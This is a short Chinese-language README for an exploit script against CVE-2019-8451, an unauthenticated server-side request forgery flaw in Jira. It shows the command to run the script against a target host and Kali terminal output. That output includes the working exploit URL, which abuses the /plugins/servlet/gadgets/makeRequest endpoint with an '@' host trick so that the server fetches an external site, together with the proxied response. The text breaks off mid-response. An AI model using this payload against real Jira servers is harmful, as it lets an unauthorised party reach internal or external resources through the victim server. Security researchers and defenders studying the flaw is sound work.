# CVE-2019-8451 Jira未授权SSRF漏洞 ## python usage 脚本github获取 `python CVE-2019-8451.py http://www.jas502n.com:8080`  ``` root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080 >>>>SSRF URL: www.baidu.com >>>>Send poc Success! X-AUSERNAME= anonymous >>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com throw 1; < don't be evil' >{"http://www.jas502n.com:8080@www.baidu.com":{"rc":200,"headers":{"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]},"body":"\r\n